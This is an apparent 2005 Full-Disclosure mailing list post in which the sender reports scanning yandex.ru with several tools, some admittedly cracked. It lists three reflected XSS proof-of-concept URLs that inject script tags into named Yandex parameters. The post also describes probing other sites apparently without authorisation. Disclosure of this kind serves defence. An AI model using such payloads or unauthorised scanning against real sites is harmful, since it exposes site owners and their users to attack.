[Full-disclosure] www.whois.sc
tgoogle
tgoogle at yandex.ru
Tue Jun 14 17:08:27 BST 2005
Hi all, again!
I try use some scanner to find vulnerability in www.yandex.ru site. Sorry, for some programm i use cracked version.
Nikto - didn't find any vulnerabilites .
www.freescan.ru - I can not scan yandex.ru (my account is blocked)
Ns-stealth - didn't find any vulnerabilites.
AppScan QA (http://www.watchfire.com/) - didn't find any vulnerabilites .
Maxpatrol (www.Maxpatrol.com, cracked version) - find 34 XSS vulnerabilites. some expamle:
http://www.yandex.ru/yandsearch?text=1&holdreq="><script>alert('maxpatrol.com')</script>&rstr=-213---&stype=www&how=tm
http://www.yandex.ru/cgi-bin/customize.pl?yxqs="><script>alert('maxpatrol.com')</script>&nl=0&text=1&how=tm
http://www.yandex.ru//yandsearch?how=tm"><script>alert('maxpatrol.com')</script>.com&nl=0&stype=1&text=1&rstr=-225
and more other...
I try scan some other site with similar result - Maxpatrol find some SQL injection and PHP include in unknown script.
Thanks alex and Gordeychik.
Full-Disclosure is hosted and sponsored by Secunia.